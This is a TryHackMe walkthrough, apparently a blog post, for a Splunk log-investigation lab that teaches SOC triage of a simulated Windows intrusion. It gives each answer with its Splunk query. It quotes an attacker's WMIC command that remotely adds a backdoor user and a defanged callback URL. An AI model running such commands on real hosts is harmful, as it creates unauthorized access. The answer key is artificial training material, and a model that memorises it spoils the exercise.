TryHackMe | Investigating with Splunk Walkthrough

5 min readMar 7, 2023

Hi there, I’m glad to see you here. In this article, we’ll solve together the “Investigating with Splunk” room in TryHackMe. In some sections, I’ll share brief about the subject. Don’t forget! You must always research to learn more. I hope it will be helpful for you. Let’s start!

Room Machine

Before moving forward, deploy the machine. When you deploy the machine, it will be assigned an IP “Machine IP: MACHINE_IP”. You can visit this IP from the VPN or the Attackbox. The machine will take up to 3–5 minutes to start. All the required logs are ingested in the index main.

Scenario

SOC Analyst Johny has observed some anomalous behaviours in the logs of a few windows machines. It looks like the adversary has access to some of these machines and successfully created some backdoor. His manager has asked him to pull those logs from suspected hosts and ingest them into Splunk for quick investigation. Our task as SOC Analyst is to examine the logs and identify the anomalies.

To learn more about Splunk and how to investigate the logs, look at the rooms splunk101 and splunk201.

Answer the questions below

Q1: How many events were collected and ingested in the index main?

A1: 12256

If we set the time filter to “All time”, we can see the total number of events.

index=main

Q2: On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username?

A2: A1berto

Using the Event ID: 4720 filter, we can find the newly created user. 🙋🏻‍♂️

index=main EventID="4720"

❗Event ID 4720 : A user account was created

Q3: On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?

A3: HKLM\SAM\SAM\Domains\Account\Users\Names\A1berto

We know which device the new user was created on. 💻

Using the Hostname and Event ID: 12 filters, we can find the updated registry key.

index=main Hostname="Micheal.Beaven" EventID="12" A1berto

❗️Event ID 12 : RegistryEvent (Object create and delete)

Q4: Examine the logs and identify the user that the adversary was trying to impersonate.

A4: Alberto

Did you notice that the attacker changed a letter when we looked at the users from the “User” section in the “Field Pane”?

index=main

Q5: What is the command used to add a backdoor user from a remote computer?

A5: C:\windows\System32\Wbem\WMIC.exe” /node:WORKSTATION6 process call create “net user /add A1berto paw0rd1

We can use the Event ID: 4688 filter to find the commands that the attacker executed on the target device from the remote computer.

Net User is a command line tool that allows system administrators to manage user accounts on Windows PCs. (A little information break! 📣)

index=main EventID="4688"

❗️Event ID 4688 : A new process has been created

Q6: How many times was the login attempt from the backdoor user observed during the investigation?

A6: 0

Let’s search to detect events associated with the new user created by the attacker.

index=main A1berto

And then when we examine the attacker’s actions, we can see that there is no login attempt.

Furthermore, when we look at the Event IDs, we can see that there is no value for login attempt.

Q7: What is the name of the infected host on which suspicious Powershell commands were executed?

A7: James.browne

When we search to find the device on which the PowerShell commands are executed, we can detect that there is only one device in the “Hostname” field.

index=main PowerShell

Q8: PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?

A8: 79

We can detect PowerShell activities by using the Event ID: 4103 filter.

index=main EventID="4103"

**Event Count for PowerShell Execution**

Q9: An encoded Powershell script from the infected host initiated a web request. What is the full URL?

A9: hxxp[://]10[.]10[.]10[.]5/news[.]php

If you’ve discovered an interesting PowerShell command, you’re in the right place; keep it up! 👊🏻

index=main PowerShell

https://gchq.github.io/CyberChef

❗️CyberChef — The Cyber Swiss Army Knife : A simple, intuitive web app for analysing and decoding data without having to deal with complex tools or programming languages.

To decode the Base64 hash value we found, we can use CyberChef’s “From Base64” and “Decode text” features.

❗️Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation. Long story short, Base64 is used to encode binary data as printable text.